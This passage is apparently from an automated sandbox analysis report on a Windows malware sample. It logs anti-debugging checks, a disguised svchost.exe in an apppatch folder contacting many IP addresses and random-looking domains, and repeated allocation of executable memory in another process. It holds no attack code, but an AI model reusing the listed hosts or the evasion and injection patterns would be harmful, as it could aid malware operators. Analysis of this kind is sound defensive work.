Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00401A30 rdtsc

0_2_00401A30

Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe

Code function: 6_2_017564A0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,

6_2_017564A0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,

2_2_02C76A30

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00401FC0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_00401FC0

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]	0_2_00406800
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]	0_2_00406B60
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Code function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]	0_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]	2_2_00406800
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]	2_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]	2_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A1360 mov eax, dword ptr fs:[00000030h]	2_2_029A1360
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A1360 mov edx, dword ptr fs:[00000030h]	2_2_029A1360
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_029A1000 mov eax, dword ptr fs:[00000030h]	2_2_029A1000
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E1360 mov eax, dword ptr fs:[00000030h]	6_2_016E1360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E1360 mov edx, dword ptr fs:[00000030h]	6_2_016E1360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 6_2_016E1000 mov eax, dword ptr fs:[00000030h]	6_2_016E1000
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA1360 mov eax, dword ptr fs:[00000030h]	7_2_02FA1360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA1360 mov edx, dword ptr fs:[00000030h]	7_2_02FA1360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 7_2_02FA1000 mov eax, dword ptr fs:[00000030h]	7_2_02FA1000
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C1360 mov eax, dword ptr fs:[00000030h]	10_2_014C1360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C1360 mov edx, dword ptr fs:[00000030h]	10_2_014C1360
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Code function: 10_2_014C1000 mov eax, dword ptr fs:[00000030h]	10_2_014C1000

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_004010A0 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,ReadFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,

0_2_004010A0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\apppatch\svchost.exe	Network Connect: 106.15.232.163 8000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 3.94.10.34 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.190.63.136 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 72.52.179.174 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: lykywid.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: vofycim.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.85.183.50 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.225.91.73 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 5.79.71.205 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 99.83.170.3 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 52.34.198.229 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 75.2.71.199 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.150.10.48 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 23.253.46.64 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.191.50.83 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 13.248.169.48 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.212.210 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 76.223.67.189 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 18.208.156.248 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.59.243.227 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 208.100.26.245 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.182.252 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: vofyruc.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 85.17.31.82 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: pumydyg.com
Source: C:\Windows\apppatch\svchost.exe	Domain query: puzytap.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 162.255.119.102 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.97.3 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 44.221.84.105 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.212.231.82 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 16E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2FA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2920000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2790000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2650000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 5E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2B90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2D10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2790000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2200000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2470000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2860000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2CA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2470000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1560000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2230000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2150000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 9F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 26D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2740000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1070000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 29D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 28E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: EE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DC0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1320000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 900000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1620000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 900000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 950000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: D40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 800000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 760000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1310000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 820000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1040000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 11C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1500000 protect: page execute and read and write	Jump to behavior
